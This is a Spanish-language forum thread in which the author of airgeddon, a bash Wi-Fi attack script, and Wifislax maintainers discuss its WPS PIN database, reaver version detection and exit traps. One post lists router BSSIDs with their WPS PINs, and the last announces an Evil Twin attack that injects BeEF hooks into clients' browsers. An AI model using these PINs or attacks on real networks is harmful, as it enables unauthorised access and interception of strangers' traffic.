Me curré un parser bastante chulo para las salidas de reaver y bully y así poder "resaltar" las contraseñas y pines obtenidos. También he adaptado el script para que funcione con todas las versiones de reaver ya que vi que en la nueva de desarrollo de 64 bits de Wifislax había un reaver 1.5.4 modificado que al principio me dio problemas ya que en su wash había una variación de una línea debido a una cabecera extra que se pinta... pero ya está solucionado y adaptado para que funcione bien en cualquier versión y sin importar si hay más o menos líneas de cabeceras.

En fin, que le echeis un ojo y me digais que os parece. Os lo agradecería.

También decir que si alguien quiere colaborar con más pines para la base de datos que por favor, no dude en hacerlo. El fichero está público en el github del proyecto "known_pins.db" en https://github.com/v1s1t0r1sh3r3/airgeddon (https://github.com/v1s1t0r1sh3r3/airgeddon) y se descarga a local para que lo podáis ver/trastear/modificar .

@USUARIONUEVO , he visto que en el nuevo wifislax de 64bits no está por defecto el hashcat para CPU. ¿Se va a poner? creo recordar que el problema era básicamente que "pesaba" mucho en megas... bueno, ya me diréis. Si al final no se pone, una pena porque también tengo adaptado ya el script para que funcione con hashcat 3. Aunque imagino que al menos habrá un paquete/modulo para ponerlo ¿no?

También estoy buscando alguien que queira colaborar con las traducciones al catalán ya que la persona que lo está haciendo actualmente tiene mucho lio y le es complicado hacerlas. Sería alguien que pueda interactuar directamente sobre el github una vez cada 15 días o una vez al mes (no es muy demandante la cosa) para simplemente ir repasando las frases en catalán que tengan la marca PoT de que aún están traducidas con el traductor automático e irlas cambiando como proceda.

Gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 13-12-2016, 16:34 (Martes)
el hashcat cpu a desparecido ...ya no existe.


antes hashcat se conformaba de 3 ejecutables ..uno para cpu only ,otro para AMD y otro para nvidia.


ahora va todo en uno.

por defecto no ira en la iso ..ya que hashcat sin driver nvidia o amd , es lo mismo que usar solo el cpu...y obvio , los drivers si que no van por defecto.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 14-12-2016, 01:56 (Miércoles)
Hiba a actualiarlo en la iso ..y veo que ahora hay un fichero externo al script ...


Código: [Seleccionar]
known_pins.db
¿tiene que estar en algun directorio concreto?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 14-12-2016, 15:45 (Miércoles)
Ese fichero ha de estar en la misma carpeta donde esté airgeddon.sh . Si no lo tiene, el propio script se lo descargará (si puede claro está) antes de realizar el ataque que lo necesita y valida que todo haya salido bien antes de lanzarlo. Así que como quieras, si lo quieres poner perfecto, aunque no es indispensable. Pero gracias.

Por otra parte, cierto, en hashcat 3 han hecho el "todo en uno" ya por fin. Airgeddon ya lo soporta y detecta la versión de hashcat para actuar de una forma o de otra. si es versión 3 o superior lo lanza con los parámetros adecuados para usarlo por CPU (que es de momento lo único que soporta airgeddon)... pero supongo que adaptarlo ahora que todo está en el mismo comando con distintos parámetros para que use GPU no será complicado si lo queremos implementar, que igual puede ser interesante. Ya veré si lo meto... depende de la demanda, y de si lo vamos a seguir teniendo. Como veais.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 15-12-2016, 22:36 (Jueves)
bueno ,pues ,..para empezar , creo que la db , sin control de version no es buena idea.


algo tipo

VERSION=   y la fecha u el commit o lo que quieras ,pero algo para llevar el control.


y despues el script si tiene internet al arrancar podria comprara con la version de github , igual que hace para si mismo  ,pues para la db , y si hay mas nueva en github , pues la actualice... no se si eso ya lo hace y no lo he visto.


otra cosa , no se si soy yo  que no me se manejar en este script aun ,pero despues de elegir tu red , no veo en el menu de elegir otra..por que ayer me equivoque en una prueba y no puede elegir  ,,,toca cerrar y abrir, y volver a escanear ...  ???


mas cosas ..veo que tienes algun trap al final ..por si el script se cierra de forma no correcta ..
has pasado a usar en wifislax el airmon-zc , osea el que en realidad es el actual , pero ..

¿sabes que si la gente al salir se queda con la interface wlan0mon no va a saber desmontarla?

por que haran por inercia

airmon-ng stop ...  y eso no va a funcionar.

igual de lo que digo ya hay cosas que estan y simplemente no las vi.


voy a empaquetar la version nueva en

/opt/airgeddon 

junto la db de pines.

piensa que la gente casi todos la usan en live ,y sin conexion a la red, con lo que el script no bajara la db y quedaria cojo , ...creo que el script debe exigir la existencia del fichero db ,si no la mitad de las cosas no estaran completas.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-12-2016, 03:20 (Viernes)
Jejeje, veo que no lo has usado mucho! no te preocupes USUARIONUEVO, está todo controlado.

Sí, el script controla que tengas el fichero de base de datos y si no lo tienes no te deja lanzar el ataque que usa dicho fichero. Por supuesto además si puede chequea si hay conexión a internet y si la hay descarga la bbdd más actualizada si procede. Para ello compara el fichero con el de "la nube" de github y si el de github es más actual lo descarga (en el caso de que tuvieras una en local... si no tienes en local intenta bajarla directamente sin comparar nada claro está). Lo hace con un sistema de checksums, no me hace falta tener un número de versión en el fichero. De hecho, así, mis colaboradores pueden actualizar la base de datos sin tener que actualizar yo el script lo que yo creo que es una ventaja. Y en github ya tenemos control de todo lo necesario con los commits branches y demás, pero gracias por la sugerencia. Todo el "arbol" de posibilidades (que es amplio) está controlado... si hay fichero, si no, si hay internet, si no, si aunque haya internet ha podido descargar el fichero, si no, si hacía falta descargarlo o no basándose en los checksums, etc, etc.

Lo de los traps... el script controla si cortas por lo sano con un Ctrl+C o similar, pero al salir te pregunta primero si estás seguro (por si le diste sin querer) y segundo que si tienes el interfaz en modo monitor, te pregunta si lo deseas conservar en este estado al salir. Si le dices que no te lo restaura. Es decir, que te deja elegir como queda al salir. Esto es muy útil para aquellos que solo abran el script para poner la tarjeta en modo monitor, que seguro que hay por ahí alguien que no se sabe ni los comandos para hacerlo, lo cual me parece normal también.

Respecto a la selección de objetivos, en la parte de arriba (antes de las opciones del menú) siempre te pone lo que tienes seleccionado como objetivo. Si no tienes nada seleccionado como objetivo y lanzas un ataque, te deja la oportunidad de escribir todos los parámetros manualmente, lo que suele ser un coñazo... escribir un BSSID es largo y tal. Lo normal suele ser escanear, seleccionar objetivo y luego lanzar el ataque. Y si quieres cambiar de objetivo, escaneas de nuevo y eliges otro.

Bueno, y creo que he contestado más o menos a todo! gracias por al menos probarlo! que yo se que tú tienes mucho lío.  :D

Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 16-12-2016, 05:09 (Viernes)
tendre que mirarlo mas despacio.

pero no vi , la opcion de elegir otro objetivo ...es decir, que se abra de nuevo el listado de lo que se ha escaneado antes, para elegir el correcto en caso de equivocacion, o que simplemente tu red conste de router + repetidor y quieras probar cosas en ambos.


lo de la interface ...tu pon en modo monitor, y cierra la ventana del script ... = te quedas colgado con wlan0mon , si no sabes desmontarlo (airmon-zc) , pues lo tienes jodidillo.

luego , lo de la bd , comprobar mediante un checksum ...que es el fichero .txt , osea otro fichero mas, cuando podria ir dentro del mismo db ..en una variable.


te pongo un ejemplo ...


tengo la bd , sincronizada con github , ...observo un positivo nuevo , y decido añadirmelo a la lista..  ahora esa lista ya no es como la que hay en github y el checksum no es igual ...  ¿que sucede en ese caso?  ... por que si es una variable definida ,como no cambia.pues no me machacara mi db local , pero si se basa en un control de checksums ...pues cuando no cuadre , no se como lo habras planeado.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-12-2016, 12:28 (Viernes)
No, el fichero del checksum no lo necesitas. Basta con que exista en la nube. Ese no lo tienes que meter, porque la comprobación es el checksum del fichero actual (que se calcula en el momento con md5sum) contra el que hay en la nube. En ningún momento el fichero txt del checksum existe en local.

En cuanto a que el propio checksum esté dentro del fichero... ha de ser un fichero aparte porque si lo meto dentro del script ya pierdo lo que quería de que se pueda actualizar la bbdd independientemente del script, y si lo meto dentro del propio fichero de la bbdd es una incongruencia porque al meterlo cambio el checksum. Así que como está creo que está perfecto. Si un colaborador quiere actualizar la bbdd, pues cambia el fichero de la bbdd, calcula el checksum y actualiza el txt de github y es independiente del script.

Respecto a eso que comentas de "veo uno nuevo y me lo añado a la lista"... airgeddon está hecho para que funcione con la lista que hay en github. Si quieres probar un pin concreto lanzas el custom pin attack y lo pruebas, y para lo demás, pues nos contactais por aqui y vamos añadiendo pines! así el conocimiento de uno lo usamos todos!  ;D un post, un mail, un msg privado, y casi con toda probabilidad en menos de un día estará actualizado en la nube.

Lo de salir del script y quedarte tirado por no saber manejar airmon... bueno, el script como te comentaba te da la opción de elegir como quieres salir, pero si en vez de hacer una salida controlada ya sea eligiendo "Salir" o dando Ctrl+C (que también se considera controlada en airgeddon), pinchas en la "X" del terminal y cortas el script a la mitad, pues eso ya no lo puedo controlar... como se quede se ha quedado. Y eso pasa además con todos los demás scripts también, no solo en airgeddon. Es que ahí no puedo hacer nada... si en medio de un proceso te lo cargas, pues es que no hay más... como mucho hacer lo que hago, que en la salida incluso de Ctrl+C se pueda quedar la tarjeta a gusto del usuario.

Respecto a lo de elegir objetivo, ahora te he entendido... te refieres a escanear objetivos y luego cambiar de objetivo sin volver a escanear. No, si quieres cambiar de objetivo volvemos a escanear en airgeddon, que no cuesta nada y así además tienes los datos actualizados lo más cerca posible en el tiempo de la acción a realizar. Si guardase la lista de lo anteriormente escaneado y permitiese cambiar de objetivo entre esos datos sin escanear de nuevo, podría pasar que si ha pasado mucho rato entre una acción y otra, igual el segundo punto de acceso que eligieses ya no esté disponible, o que si el dueño lo reinició o se reiniciase por cualquier circunstancia, ya sabes q muchos APs tienen el canal en "auto" e igual podría estar ya en otro canal y luego que no funcionase el ataque o acción a realizar. Eso siempre puede pasar, si tu justo seleccionas y te lo cambian de canal... pero al menos así intentamos minimizar el número de veces que eso pueda ocurrir.

No se, es mi punto de vista. Lo he intentando hacer lo más robusto posible. Gracias como siempre, todas las opiniones son escuchadas y valoradas y se agradecen, de verdad.

Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 16-12-2016, 14:01 (Viernes)
men , no he dicho nada del checksum dentro del fichero ,eso no.

una VARIABLE


VERSION=25-DE-DICIEMBRE FUN FUN FUN

Por ejemplo , y lo grepeas y comparas con el de github.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-12-2016, 14:04 (Viernes)
Ok ok... pero como te comentaba, quería tener separado el script de la bbdd de pines, para que se pueda actualizar una cosa sin actualizar la otra.

Citar
Y lo de lanzar algo si cierran con la X de la ventana de terminal, eso sí que me interesa!! no sabía que eso se podía controlar. Así lanzaría los mismos procesos que lanzo en la salida controlada, aunque sin preguntas, restaurando directamente el interfaz a managed si no lo estuviera ya. Lo miraré. Gracias.

EDIT. Uys... esto que pongo en el quote era mi respuesta a algo que pusiste, pero has editado y lo has quitado... que estamos los dos ahí petando el F5, refreshers totales, xdddd
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 16-12-2016, 14:07 (Viernes)
espérate que arranque Linux y te lo busca.


eran cosas de tipo de "si hay interrupción" , y se llama a la función encerrada ..que solo se ejecuta al invocarla.


las versión de db y script pueden estar perfectamente en los dos ficheros y ser distintos.


luego con curl ... puedes leer la variable en cada uno de los dos ficheros de github.


igual también te interesa otra cosa ...que explicada es un poco "este tio esta flipao" .. ;D


variables que a su vez sean variables...


por ejemplo , puedes poner

DEBUG=0

Y que al mismo timpo puedas lanzarlo con DEBUG=1 pasándolo com parámetro..sin editar el script.


Código: [Seleccionar]
DEBUG=1 airgeddon.sh
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-12-2016, 14:11 (Viernes)
Si, puedes poner num de version en vez de un checksum... pero es que no me aporta nada nuevo. Es decir, que como está ya se actualiza si procede y hay algo más nuevo en la nube... y ya está hecho. Como tu dices también está bien la verdad, pero al final el resultado es el mismo que lo que tengo ahora. Yo creo que esto lo voy a dejar así.

Lo de la interrupción de cerrar por las bravas dando a la X si se puede hacer sí que me interesa mucho!

Y lo de los parámetros de tipo debug y tal... no se... bueno, podría ser. La verdad es que me da un poco igual. Si eso solo lo uso yo para programar...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 16-12-2016, 14:14 (Viernes)
lo de ejecutar un proceso..aunque se cierre de la X


creas la funcion "encerrada"


desmontar(){
bla bla bla
}

y
Código: [Seleccionar]
trap desmontar SIGHUP SIGINT
trap llama a la funcion si se produce un  SIGHUP  o un  SIGINT

o traducido ..proceso interrumpido.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-12-2016, 14:17 (Viernes)
Genial! ahora mismo solo manejaba el Ctrl+C y el Ctrl+Z que son INT y SIGTSTP (no se si el orden era así o al revés, pero son esos dos).

Pues para la proxima subida ya tengo para entretenerme. Mil gracias!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 16-12-2016, 14:17 (Viernes)
variable..que a su vez es variable... ;D


Código: [Seleccionar]
DEBUG=${DEBUG:-"0"}
DEBUG , sera 0 , siempre y cuando no se pase otra cosa.


si ejecutaramos

DEBUG=1 airgeddon.sh   , la variable seria = 1  ;D


No voy de pro ni nada, son truquillos que aprende de mirar otros scipts...yo soy bastante patetico con bash  ;D 8)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 16-12-2016, 14:27 (Viernes)
la primera vez que vi el uso de "trap"  , fue en goyscript ..

que al arrancar detenia varios servicios y aun cerrando de la x , se restauraba todo ..y estube indagandolo ..no se si se lo llegue a preguntar directamente.

luego hay varios scripts que hacen uso de esos truquillos , como geminisauditor , wpspingenerator y alguno mas.


los updaters por ejemplo llevan eso , por si cortas  a mitad de estar compilando codigo ..se limpia todo , temporales, archivos descargados y demas.  ;D


espero te sirva.  ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-12-2016, 14:34 (Viernes)
No te preocupes, yo no soy ningún pro (de hecho, estoy bastante lejos  ^-^ ), pero todos los consejos, truquillos, ayudas son bienvenidos... hay gente que igual se lo toma de alguna forma rara, en plan "me quieren corregir" o que se yo... yo solo lo tomo como que me están queriendo ayudar y sugiriendo cosas... luego ya se harán o no o lo que sea dependiendo como sea la cosa, pero que por proponer no quede.

Goyscript es muy buen script y fuente de inspiración para muchos (yo entre ellos). Es otro de los scripts que nombro en los créditos de mi github y ahora que lo sacas a la luz, pues le echaré un ojo a ver que se cuece por ahí... aun a riesgo de que algún "flammer" ahora salte diciendo que si voy a copiar no se que o los rollos de siempre... q la verdad es q "sudo" bastante <- chiste malo linuxero

Bueno, lo dicho. Voy al lío. Thx again.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-12-2016, 18:56 (Sábado)
Vale hecho, ya funciona guay... ahora si cierras por las bravas te devuelve el interfaz a modo managed si procede... probado en varios linux y con varias tarjetas. Funcionando.

Aún no lo he pasado a master, pero por si alguien lo quiere ver, está en la rama dev aquí: https://github.com/v1s1t0r1sh3r3/airgeddon/tree/dev (https://github.com/v1s1t0r1sh3r3/airgeddon/tree/dev) . Es la versión 5.13... que quiero hacer más cositas antes de pasarlo a master y que se le actualice a todo el mundo.

Gracias una vez más, es una buena mejora!!!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-12-2016, 20:34 (Sábado)
estoy ultimando iso para version final.


me gustaria que esa mejora entrase de serie ,por lo que te dije ... yo por que al ver wlan0mon ya sabia lo que estaba pasando ,pero la gente no va a saber devolverla a managed por que intentaran con airmon-ng , en lugar del zc  ;)


No se si ya lo habras hecho , pero tal vez es momento de ajustar el time out , aquello de ponerlo a 30 que te han recomendado mas personas  ;)

gracias por tu esfuerzo.


PD: Es un defecto que tengo ...hablar sin mirar antes :=)  ya has cambiado tambien el time out.

WPS timeouts changed. More traps handled. Auto restore managed mode o…
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-12-2016, 21:34 (Sábado)
Joder, me has leido el pensamiento... estoy ahora mismo liado con los timeouts... jejeje, que pájaro... eso es que lees otros foros donde hablé de ello (de los timeouts)...

Bueno, estoy haciendolo pr0 para que el usuario pueda elegir el q le salga del bolo... el recomendado por defecto serán 30 segundos.

Te aviso en cuanto esté. Como estoy a tope con esto, supongo que esta noche o mañana mismo podría tenerlo. lo malo es lo de siempre... las traducciones, que la gente siempre tarda... pero bueno, las de español e inglés siempre están, que son las que yo hago. y el resto irán traducidas con traductor automático como siempre y con la marca PoT (pending of translation) hasta que lo hagan.

De todas formas, como el script se actualiza solo, en cuanto las tenga, las tendrá todo el mundo... así que lo dicho, te aviso en cuanto tenga esto por si quieres meter la 5.13

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-12-2016, 21:42 (Sábado)
la idea es empaquetar en wifislax ,  ;)

ya se que se actualiza el script ,pero vamos a lo de siempre , no todo el mundo esta conectado ..usan el live sin conexion y demas...por eso quiero empaquetar una de serie , que por lo menos no se queden con la interface wlan0mon  ;).


hay tiempo ,asi que no te mates tampoco , creo que por lo menos 3-4 dias hasta la version final.

y si , leo todos los foros que de alguna manera considero interesantes , sin importarme quien este por ese foro.

He leido el comentario de pastilla (viejo conocido por aqui) , que esta usando wifislax-4.12 , ... y si que tiene reaver 1.5.2 , o 1.5.3 no recuerdo ...solo que para no solapar ese esta reonmbrado como

reaver-6tx o  reaver_6tx

no recuerdo exactamente , en cualquier caso ni te molestes por que eso va a quedar atras con la version de 64 bits, no vale la pena añadir variabls para un wifislax que va a quedar obsoleto en unos pocos dias.  ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 17-12-2016, 22:18 (Sábado)
Pues ale, ya lo tengo listo, probado y funcionando en dev... aún no lo voy a pasar a master, si tenemos aún unos días, dame algo de tiempo para ver si alguno de mis traductores le da por hacerlo a tiempo, les acabo de avisar de que hay cambios.

Yo estoy ahora de vacaciones, así que tengo tiempo para hacer el freak todo el que haga falta... dime cuando es el límite y lo paso a master justo antes con todos los cambios que haya y te aviso. Tranqui que no fallo.

Bueno, como decía, ahora te da la opción de cambiar el timeout para los ataques wps... ha quedao muy chulo la verdad  >:(

Por cierto, ayer o anteayer metí unos pines más en la bbdd, por si la quieres actualizar tb.

Respecto a lo que comentaba ese usuario en el otro foro... la verdad es que debe estar liando alguna... porque yo con wifislax 4.12 no tengo ningún problema y el reaver que viene es el 1.5.2 que es el mínimo justo para hacer los pixie dust attacks integrados... así que yo creo que se está confundiendo y no está usando wifislax 4.12 porque según el mensaje que le da airgeddon, la versión que tiene es 1.4-r119 así que no se si se referirá al 4.12 ese que sacasteis para vmware que no era la final y que igual ese tiene (no lo se) un reaver más viejuno... pero bueno, que como dices, tampoo merece la pena ya hacer nada y tampoco puedo hacer nada más, ya está validada la versión y por lo que comenta el propio usuario, airgeddon está detectando bien la versión que él tiene y validando correctamente, así que no se... que actualice.

Saludetes y feliz navidad!!

Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-12-2016, 22:28 (Sábado)
la db , la actualice creo ayer de madrugada , habia solo un pin nuevo.  ;D
Título: Re: Script multiuso en bash, airgeddon
Publicado por: r3sh0ck en 17-12-2016, 23:46 (Sábado)
Sois lo maximo, por si os sirve de algo ahi os dejo esto ;)
Estas mac son vulnerables a PixieScript

BSSID : 08:7A:4C:27:00:xx   PIN WPS : 25561043
BSSID : BC:14:01:BC:11:xx   PIN WPS : 39563293
BSSID : BC:14:01:F9:A8:xx   PIN WPS : 39594723
BSSID : 00:26:5B:44:1C:xx   PIN WPS : 22760203
BSSID : 00:22:F7:28:CF:xx   PIN WPS : 26745527
BSSID : 00:26:5B:1E:D3:xx  PIN WPS :37071233
BSSID : BC:14:01:F9:A3:xx  PIN WPS : 33658728
BSSID : F8:8E:85:27:29:xx  PIN WPS : 96458815
BSSID : E2:41:36:84:1F:xx  PIN WPS : 86588324
BSSID : B2:46:FC:78:1A:xx  PIN WPS : 78711600
BSSID : E0:41:36:4B:3B:xx  PIN WPS : 49303407
BSSID : F8:8E:85:DA:9A:xx  PIN WPS : 19117652
BSSID : E2:41:36:9C:26:xx  PIN WPS : 02335766
BSSID : F8:BF:53:C4:76:xx  PIN WPS : 12345670
BSSID : F8:63:94:87:91:xx  PIN WPS : 12345670
BSSID : F8:8E:85:CD:18:xx  PIN WPS : 16035232
BSSID : E2:41:36:9C:24:xx  PIN WPS : 02329604
BSSID : E2:41:36:9D:44:xx  PIN WPS : 03066089
BSSID : E2:41:36:65:60:xx  PIN WPS : 66437369
BSSID : E2:41:36:08:B1:xx  PIN WPS : 05698165
BSSID : E2:41:36:AE:B4:xx  PIN WPS : 14495601
BSSID : E2:41:36:5C:B4:xx  PIN WPS : 60755285
BSSID : B2:46:FC:7B:B5:xx  PIN WPS : 81073443
BSSID : F8:63:94:54:CB:xx  PIN WPS : 12345670
BSSID : E2:41:36:8F:E9:xx  PIN WPS : 94315202
BSSID : 20:08:ED:CF:34:xx  PIN WPS : 35794448
BSSID : 68:B6:FC:84:15:xx  PIN WPS : 54566859
BSSID : BC:14:01:BC:55:xx  PIN WPS : 11891987
BSSID : 00:05:CA:8D:CF:xx  PIN WPS : 48795203
BSSID : 00:05:CA:7B:88:xx  PIN WPS : 99753795
BSSID : BC:14:01:F8:D5:xx  PIN WPS : 80173496
BSSID : BC:14:01:93:4C:xx  PIN WPS : 76226199
BSSID : 6A:96:BF:6E:3C:xx  PIN WPS : 78248526
BSSID : 62:CB:A8:4B:81:xx  PIN WPS : 64878416
BSSID : 62:53:D4:B9:76:xx  PIN WPS : 48095099
BSSID : 00:14:5C:94:07:xx  PIN WPS : 97012948
BSSID : BC:14:01:F9:E2:xx  PIN WPS : 93066006
BSSID : 68:B6:FC:5E:3F:xx  PIN WPS : 33650739
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 20-12-2016, 19:09 (Martes)
fecha tope , viernes 23  ;)

pasate algo a la rama estable.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-12-2016, 19:25 (Martes)
Perfecto, la 5.13 está lista a falta de unas traducciones del francés. Voy a "achuchar" para que de tiempo, a ver si es posible, y si no, lo pasaría sin esas traducciones (hechas con el traductor automatico), pero pasar pasa a tiempo. Gracias.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: pastilla en 21-12-2016, 22:31 (Miércoles)


Respecto a lo que comentaba ese usuario en el otro foro... la verdad es que debe estar liando alguna... porque yo con wifislax 4.12 no tengo ningún problema y el reaver que viene es el 1.5.2 que es el mínimo justo para hacer los pixie dust attacks integrados... así que yo creo que se está confundiendo y no está usando wifislax 4.12 porque según el mensaje que le da airgeddon, la versión que tiene es 1.4-r119 así que no se si se referirá al 4.12 ese que sacasteis para vmware que no era la final y que igual ese tiene (no lo se) un reaver más viejuno... pero bueno, que como dices, tampoo merece la pena ya hacer nada y tampoco puedo hacer nada más, ya está validada la versión y por lo que comenta el propio usuario, airgeddon está detectando bien la versión que él tiene y validando correctamente, así que no se... que actualice.


Visitor estoy utilizando la version de wifislax 4.12 en vmware y te ha dicho que pasaba usuarionuevo:

Cita:

He leido el comentario de pastilla (viejo conocido por aqui) , que esta usando wifislax-4.12 , ... y si que tiene reaver 1.5.2 , o 1.5.3 no recuerdo ...solo que para no solapar ese esta reonmbrado como

reaver-6tx o  reaver_6tx
-----------------------------------

En eso tambien me fije mirando con el programa QTZmanager que lleva wifislax en el que salia un reaver, me parece el 1.5.2 con esa extension 6tx el cual tu script no lo detectaba, me parece que si ponias reaver en consola tampoco lo detectaba sacaba la version que te puse, pero no habia nada que actualizar en ese caso ya que no hay actualizador en wifislax para el reaver solo lo que tu me dijistes yendo a las fuentes e instalandolo asi, con vmware como dices podia ser mas vieja que la final y le faltaba por lo que no habia nada que actualizar tampoco (a nivel versiones). lo mas sencillo es buscando el programa e instalandolo por eso te dije de que como haces una script paso a paso le pongas la direccion de las fuentes cuando de error al no encontrar lo necesario para tu script y le facilitas las cosas a los que lo ejecuten en cualquier sabor linux.

Un saludo y gracias
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-12-2016, 12:33 (Jueves)
@USUARIONUEVO, ya tienes la versión 5.13 en master... a tiempo!!

@pastilla... airgeddon saca la versión de reaver de lanzar el comando reaver -h (que es lanzar la ayuda) y parsear la salida. Este es el código que usa irgeddon:

Citar
#Determine reaver version
function get_reaver_version() {

   reaver_version=$(reaver -h 2>&1 > /dev/null | egrep "^Reaver v[0-9]" | awk '{print $2}')
   if [ -z "${reaver_version}" ]; then
      reaver_version=$(reaver -h 2> /dev/null | egrep "^Reaver v[0-9]" | awk '{print $2}')
   fi
   reaver_version=${reaver_version#"v"}
}

Lo hace dos veces porque depende de la versión de reaver, a veces la ayuda no muestra nada por el stdout y sí por el stderr... curioso... bueno, con este "trukillo" lo cojo sea como sea... lo lanzo de una forma y si no obtengo nada, lo lanzo de otra. y así saco siempre la versión de reaver que hay, porque al principio del comando de sacar la ayuda sale una línea que pone:

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Y es de ahí de donde pillo la version, porque reaver no tiene un parámetro -V ni nada parecido para sacar la versión como tiene bully que con bully haces "bully -V" y listo... pero no, con reaver todo tiene que ser complicado...

El tema es que habría que ver que salida tiene el comando "reaver -h" en el wifislax que tú tienes pastilla. Si puedes pega por aquí la salida y lo analizamos... aunque según lo que comentaste y según mi teoría, supongo que tendrás algo así:

Reaver v1.4-r119 WiFi Protected Setup Attack Tool

Si es así, pues todo está en su sitio... tienes un reaver 1.4 que no llega al 1.5.2 requerido para hacer pixie dust. Ya nos dirás que te sale al hacer reaver -h
Título: Re: Script multiuso en bash, airgeddon
Publicado por: pastilla en 22-12-2016, 15:26 (Jueves)
¡Hola! ya instale la version que me pusistes en el enlace cuando te dije lo del problema con el pixie dust:

Tu cita del foro lampi:

"Así que lo único que te puedo decir es que te actualices reaver y bully. por ejemplo, para actualizar bully a la versión chula es super facil. Te metes aquí, lo descargas y sigues las instrucciones, que está chupao! https://github.com/aanarchyy/bully

Lo mismo aquí para reaver: https://github.com/t6x/reaver-wps-fork-t6x"

.......................................

la salida del comando "reaver -h" despues de actualizarlo en wifislax 4.12 vmware:

wifislax ~ # reaver -h

Reaver v1.5.3 WiFi Protected Setup Attack Tool

---------------------------

Y ya con eso funciono pixie dust con reaver en tu script, la cosa es lo que te decia usuarionuevo que habia renombrado el archivo "reaver_t6x_1.5.2" en la version 4.12 de vmware para lo que fuese y por eso no lo localizaba tu script y a mi en la consola tambien me salia la version vieja antes de actualizarlo.

Un saludo

Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 22-12-2016, 16:17 (Jueves)
os estais liando jodder.



vamos a ver


wifislax lleva como 4 reavers

al ejecutar reaver sin mas (sale el 1.4-r119)
luego tenemos

reaver-1.3  --> sale reaver 1.3
reaverMOD --> sale el mod para no checksum
reaver_6tx --> ejecutando este saldría el reaver 1.5.3 que lleva pixiedust


eso para la versión de wifislax de 32 bits


en la de 64 bits la cosa se simplifica


reaver --> saldrá el mas nuevo 1.5.3
reaver-1.4 --> reaver versión 1.4

por eso digo no vale la pena que miréis ni hagáis nada a estas alturas ..por que en el wifislax64 el reaver por defecto (ejecutando reaver en consola) ,ya es el que se necesita ... y si quieres trastera puedes ejecutar el viejo 1.4  con reaver-1.4


creo es fácil de entender ..  "EJECUTABLES CON DISTINTOS NOMBRES"  ,  solo que antes el de por defecto era 1.4  y ahora será 1.5




#visit0r   gracias , esta noche actualizare ...y seguramente mañana viernes liberare wifislax64
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2017, 14:13 (Jueves)
Bueno chic@s, el otro día ya pasé a master la nueva versión 6.0 de airgeddon . Se os actualizará sola, como siempre. Esta ya integra un ataque Evil Twin muy especial con sslstrip2 (también llamado sslstrip+) por medio de bettercap (un ettercap más currao) y también integra BeEF. Además con bettercap inyectamos directamente los javascripts (hook.js) de BeEF a los clientes de la red por lo que es muy cómodo. Abres el panel de control de BeEF y ale, a pescar!

Gracias USUARIONUEVO por esa integración de BeEF en el wifislax de 64bits. Ahorra mucho tiempo. La verdad es que instalar BeEF a mano es un infierno... entras en la espiral de errores de dependencias de ruby y dependiendo del sistema puede ser complicadillo, yo lo he instalado a mano ya un par de veces y tiene "su cosa". Pero bueno, que lo mejor para usar esta carácterística es usar un Linux en el que ya venga instalado de base como Kali Linux, BlackArch (en el que por cierto han incluido airgeddon), Parrot, Backbox o por supuesto Wifislax!

Y hasta aquí para seres humanos normales... lo siguiente no lo leas si no te interesan las penurias de un desarrollador o si no eres de "saber como van las cosas por dentro".

******SOLO TARADOS ZONE********

Pues eso, que ahora que funciona muy bonito, pero integrar BeEF ha sido el puto infierno... desde luego no lo tienen pensado para que esté integrado en ninguna parte, eso seguro... he tenido que lidiar con todas estas movidas:

1. BeEF no se puede ejecutar con ruta absoluta... no puedes hacer "/ruta/de/beef" ... noooo, tienes q entrar a la carpeta con un "cd /ruta/de" y luego un "./beef". Pues esto no os imaginais lo que dificulta el proceso esta ))))). De hecho, lo que hay en /usr/bin no es un ejecutable de beef. Siempre es un script que hace cd a la ruta y luego ejecuta ./beef o similar... comprobado en varios sistemas que traen ya beef.

2. Dependiendo del sistema, el ejecutable de beef (el que está en /usr/bin) se llama de una forma. En unos sistemas es beef, en otros como Kali linux es beef-xss y en otros beef-server. Hasta ahora tenía el caso de que el mismo ejecutable estaba en distintos paquetes de instalación, pero no tenía el caso de que el mismo programa pudiera tener distintos nombres de invocación. Tuve que hacer un sistema de arrays de posibles alias para solucionarlo.

3. ¿Os podéis creer que en muchos sistemas existe un paquete que se llama beef también pero que no es el BeEF que usamos aquí? pues si, lo que el script usa es BeEF (Browser Exploitation Framework), pero existe un beef (Flexible Brainfuck interpreter) cuyo ejecutable se llama beef también y que me jode la vida... no había más nombres?? bueno, pues eso también está ya controlado y comprobado para que no se líe airgeddon si tienes instalada esa basura.
